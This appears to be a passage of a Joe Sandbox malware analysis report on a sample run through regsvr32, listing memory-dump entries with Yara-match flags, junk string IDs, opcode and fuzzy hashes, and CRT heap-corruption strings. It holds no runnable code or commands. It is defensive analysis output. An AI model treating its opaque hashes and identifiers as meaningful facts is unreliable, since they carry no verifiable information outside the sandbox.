                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <!b$[2\$q+|k$qz;
                                    • API String ID: 0-4125875841
                                    • Opcode ID: 4b7cb7bbd3893869e40255ef41bc2512a7308139999d5a55f5be408d5e599cf0
                                    • Instruction ID: a542c4577bd7c2caf4f59e22e2006f44d15bdd166a7528eec1f5ff4567d3e676
                                    • Opcode Fuzzy Hash: 4b7cb7bbd3893869e40255ef41bc2512a7308139999d5a55f5be408d5e599cf0
                                    • Instruction Fuzzy Hash: 883234716187448FC769DF68C58A65EBBF0FB86744F10891DF6868B2A0C7B2D809CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &$5RX$WE0$\h]
                                    • API String ID: 0-3485045178
                                    • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                    • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: A1$A1$\)$v8
                                    • API String ID: 0-2822171287
                                    • Opcode ID: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                    • Instruction ID: 6e847e787c057b57acc1c354f394c9b4082fee365cea8ba22b71c11ea9ebc013
                                    • Opcode Fuzzy Hash: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                    • Instruction Fuzzy Hash: 40F1EF71904348DBCF9CDF68C88A6DE7FA1FF48394FA05129FA4697250C7759989CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *ECV$;.$;.$pv>&
                                    • API String ID: 0-2557916696
                                    • Opcode ID: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                    • Instruction ID: 7999f9c4935295cc2aa309186ca72e602cbe03928e3ff34651e0e21172d74868
                                    • Opcode Fuzzy Hash: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                    • Instruction Fuzzy Hash: 52F1C0B0505609DFCB98CF28C599ADA7BE0FF48348F41812EFC4A9B260D774DA68DB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Hwn$NR'$$fkD$}gK
                                    • API String ID: 0-1908897248
                                    • Opcode ID: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                    • Instruction ID: b3495f7b3258c7cfbbaf34d24a151d9f74cd673a76d708f913f7006ffd896b9d
                                    • Opcode Fuzzy Hash: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                    • Instruction Fuzzy Hash: 4AE1E6701083C8CBDBFADF64C889BDA7BACFB44708F105519EA0A9E258DB745789CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !vT$3P$?gs $Y^u
                                    • API String ID: 0-3532888945
                                    • Opcode ID: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                    • Instruction ID: a130400614884e80b8bc041bf9d1a61bd98fb93a976fe1395b57ea9810b4de45
                                    • Opcode Fuzzy Hash: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                    • Instruction Fuzzy Hash: 72C1207160170DCBDBA8CF28C18A6CE3BE5FF48354F104129FC1A9A261D7B4EA59DB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -,$7k A$k$2s
                                    • API String ID: 0-3102563331
                                    • Opcode ID: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                    • Instruction ID: bac349e1162b647475c44c7bb34b04b6f4b8289c4e67fa9b2355cb93066e8c6e
                                    • Opcode Fuzzy Hash: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                    • Instruction Fuzzy Hash: 36C1387151074D9BCF89DF28C88A5DD3BB1FB48398F566219FC4AA6260C7B4D584CF84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 76N$Ho<$]}$s5xe
                                    • API String ID: 0-3382501871
                                    • Opcode ID: 48f959005062580ac36a5c68606ec558c6a5f2e613880a1e5b76a83967194bde
                                    • Instruction ID: 0065c1d241d3448e2397ca8c0fa5a5365e82301828f7e764778ef267285b4530
                                    • Opcode Fuzzy Hash: 48f959005062580ac36a5c68606ec558c6a5f2e613880a1e5b76a83967194bde
                                    • Instruction Fuzzy Hash: 47A1E171504349CFCB95DF28C089ACA7BE0FF58308F42562AFC49A7255D774DAA8CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <~]$@:$]U$]U
                                    • API String ID: 0-740249671
                                    • Opcode ID: f6acb40b154dde8fa3df42201c69f340e4f140856c7e7667b8c968f76e5b3c44
                                    • Instruction ID: 93bbccedb30105693727df547a8ee70240eea560fa1b67170d45bbd81435be64
                                    • Opcode Fuzzy Hash: f6acb40b154dde8fa3df42201c69f340e4f140856c7e7667b8c968f76e5b3c44
                                    • Instruction Fuzzy Hash: BC81387450660DCFDB69DF68D0867EE77F2FB24344F204029E815DA2A2D774CA19CB8A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                    • API String ID: 0-1867057952
                                    • Opcode ID: ea889a4d0a0d63da2a4932dba4f80fda51d0f679e8992708aed7b5cf259d3687
                                    • Instruction ID: 816e6155049e65d920809caa47ac9e1d3897b88b3389a19d13bb62d5438e95d4
                                    • Opcode Fuzzy Hash: ea889a4d0a0d63da2a4932dba4f80fda51d0f679e8992708aed7b5cf259d3687
                                    • Instruction Fuzzy Hash: E2810D36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: U!t$)$o}$q
                                    • API String ID: 0-3686089749
                                    • Opcode ID: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                    • Instruction ID: 504cee08a43b26f7e4edd141fcc1dad3608ee18550f5ec8ccdea89eebec808be
                                    • Opcode Fuzzy Hash: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                    • Instruction Fuzzy Hash: 74918CB190030E8FCB48CF68D58A5DE7FB1FB68398F204219F85696254D77496A5CFC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4<$4<$Hhr$J;}
                                    • API String ID: 0-2050331814
                                    • Opcode ID: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                    • Instruction ID: 3d3ba58424421bda00612f90d71964148b60402fac749f980543760ede98840e
                                    • Opcode Fuzzy Hash: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                    • Instruction Fuzzy Hash: 7461F4B0615648DFDF58DF68C08A69A7BA1FB48354F00C12EFC1ADB294DB70DA58CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;$;$eQ%$_
                                    • API String ID: 0-1753937898
                                    • Opcode ID: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                    • Instruction ID: 3574068fecf093fcbc9a635d24f3027655c33c427b378eb3a0ef079df85d540d
                                    • Opcode Fuzzy Hash: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                    • Instruction Fuzzy Hash: 868137705003CCABDBFACF28CC997D93BA0FB49354F50822AE94A8E250DF745B499B40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :U$<;?:${(${(
                                    • API String ID: 0-1086306767
                                    • Opcode ID: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                    • Instruction ID: ff3a3435717f4ead1b58fb824901535bd9cf299cdf9a7bd1c813f3606ded2d6e
                                    • Opcode Fuzzy Hash: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                    • Instruction Fuzzy Hash: 0861E0705187848BD768CF28C18965FBBF0FB8A748F10891EF68686260D7B6D948CB03
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Oh$h<$t010$|N.
                                    • API String ID: 0-2324740333
                                    • Opcode ID: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                    • Instruction ID: 16379aaf1bb4413e0c13418f9d8c18c2bc98b7e827952bd0a9b5f9990c6c03cf
                                    • Opcode Fuzzy Hash: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                    • Instruction Fuzzy Hash: E051B1B090034A8BCF48DF68D48A4DE7FB1FB58398F60461DE85AAA250D37496A4CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: GW$V{mu$dF
                                    • API String ID: 0-3399639152
                                    • Opcode ID: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                    • Instruction ID: 5d4924119bb90987b6c65e27c55bf51887eeb75551c0c0a5c8140b5b1edb0396
                                    • Opcode Fuzzy Hash: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                    • Instruction Fuzzy Hash: B8F13F71508B888FD7B9CF28D48969EBBF0FB84744F20461EE5A59B270DBB49645CF02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: K:$]w($n S$
                                    • API String ID: 0-3322466707
                                    • Opcode ID: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                    • Instruction ID: e698a885d6bb162bf0ff3cac371d937558b4210aa05752a6266eb715b4493fc4
                                    • Opcode Fuzzy Hash: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                    • Instruction Fuzzy Hash: 94F11570D047588BDBA8DFA8C88A6DDBBF0FB48304F60821DD85AAB251DB749949DF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $L+$S'$$o%
                                    • API String ID: 0-4100028055
                                    • Opcode ID: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                    • Instruction ID: 179b9f87c3a4f9e214743648708db8209e3d71a45a824f016a1577c5ed2144a1
                                    • Opcode Fuzzy Hash: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                    • Instruction Fuzzy Hash: 34F1DFB1504609DFCB98DF28C0896DE7BE0FB58358F41812AFC4A9B264D770DA68DB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D"C!$r>$7
                                    • API String ID: 0-4181936694
                                    • Opcode ID: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                    • Instruction ID: 0283378d108cf163dc6514248e6e0b5631fea62f1129ef615c9b8fd25e2e86b8
                                    • Opcode Fuzzy Hash: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                    • Instruction Fuzzy Hash: 1BE1EF70510B4CEBDBD9DF28D8CAADD3BA0FB48394FA06219FD0686250D775D989CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 47T]$K_j$is[
                                    • API String ID: 0-2699472077
                                    • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                    • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: B+=$Mt$[4
                                    • API String ID: 0-935141491
                                    • Opcode ID: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                    • Instruction ID: bf1f234f614a92c8f0daef92778263c373ce788cc2d228a45e1a9745d38385ec
                                    • Opcode Fuzzy Hash: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                    • Instruction Fuzzy Hash: 36F1D470505B888FDBB9DF24CC897EB7BA0FB94316F10551EE84A9A290DFB49648CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $c7$@%?5$b3
                                    • API String ID: 0-1970763919
                                    • Opcode ID: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                    • Instruction ID: 7544b270a4a1d87a4c453583f66bfc56a0d33d7204b7a287ddb0882fb61d0d22
                                    • Opcode Fuzzy Hash: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                    • Instruction Fuzzy Hash: 48E158B5902748CFCB88DF68C69A59D7BF1FF59308F404029FC1A9A264D7B4D928CB49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #^$`]$%
                                    • API String ID: 0-102912427
                                    • Opcode ID: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                    • Instruction ID: 878e7741f870b7fe1bc6c0f4a33361fdae8fd10665ac772b8c524eb0937c225a
                                    • Opcode Fuzzy Hash: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                    • Instruction Fuzzy Hash: FDB1277090474D8FCF48CF68C88A6DE7BF0FB48398F165219E85AA6250D778D549CF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: EQp$JK8[$kU
                                    • API String ID: 0-1401246002
                                    • Opcode ID: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                    • Instruction ID: 75ff6837d11cf9dd0609e11c9b8f3cf17f900585419d92be27056132c399e7dd
                                    • Opcode Fuzzy Hash: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                    • Instruction Fuzzy Hash: 2EB1587190474DCBCF88CF68C48A6DE7BF0FB58358F165219E94AA6260C778D584CF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /@=`$h$zJ
                                    • API String ID: 0-1145068787
                                    • Opcode ID: 058fb21ebd37bd9eb3c247c823e69362e4f90846d4c9b1e02e85b924af49b442
                                    • Instruction ID: efaff62c6dea5b666cd0ec5e1287633bd35f75f1b854ced8b25ae11fb6165d3c
                                    • Opcode Fuzzy Hash: 058fb21ebd37bd9eb3c247c823e69362e4f90846d4c9b1e02e85b924af49b442
                                    • Instruction Fuzzy Hash: 74A12F70608B4C8BEB9ADF18C4857DD7BF1FB49384F508559F84A86292CB34DA49CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $g$>6$nB
                                    • API String ID: 0-1868063892
                                    • Opcode ID: ff2a3d7c641745ffb25121b662fa46cfa0900d035ad6a59b85364cfb369e7909
                                    • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                    • Opcode Fuzzy Hash: ff2a3d7c641745ffb25121b662fa46cfa0900d035ad6a59b85364cfb369e7909
                                    • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #\9$Vj+&$M
                                    • API String ID: 0-3658199817
                                    • Opcode ID: b54fe4db0c482ebc48653361818c1ec5b550a7c5ec628dbf807c67c5d3739686
                                    • Instruction ID: 26c1b974044aa0bae0d49f3ac843ec2fe1acc35572613d15cd803358aab69238
                                    • Opcode Fuzzy Hash: b54fe4db0c482ebc48653361818c1ec5b550a7c5ec628dbf807c67c5d3739686
                                    • Instruction Fuzzy Hash: FEA144709147098FCB48CFA8D88A5DEBBF0FB48318F11421DE89AB7250D778A945CF99
                                    Uniqueness

                                    • Instruction Fuzzy Hash: 2F41D4B080038E8FCB48CFA8D8865DE7BF0FB48358F504609E86AA6250D7B49665CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <\$P
                                    • API String ID: 0-3329260309
                                    • Opcode ID: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                    • Instruction ID: 7a6472800a972813acd2230f771f615073e8df7510407cf225569f4894f6b0d7
                                    • Opcode Fuzzy Hash: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                    • Instruction Fuzzy Hash: AC41A2B181034DCFDB44CF68C88A5DE7FF0FB58358F104619E869A6250D7B89698CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &Z];$j,
                                    • API String ID: 0-1323350831
                                    • Opcode ID: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                    • Instruction ID: 4d52acf51d445db6beda3a26974f1176594abf5478927dcbf805cd9d8e8fa18c
                                    • Opcode Fuzzy Hash: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                    • Instruction Fuzzy Hash: 9F31DEB190074E8BCF48DF24C88A1DE3BA1FB28798F50461DFC5696250D7B4D6A4CBC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'd=$Y6C
                                    • API String ID: 0-2002142494
                                    • Opcode ID: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                    • Instruction ID: ccf6aaa63b1aa8c6b30d000549e8006a3e599278b8e3fc9790a4e3cb01e02506
                                    • Opcode Fuzzy Hash: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                    • Instruction Fuzzy Hash: 744191B190034E9FCB44CFA8D48A5DEBFF0FB58398F205619E81AA6250D3B49694CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
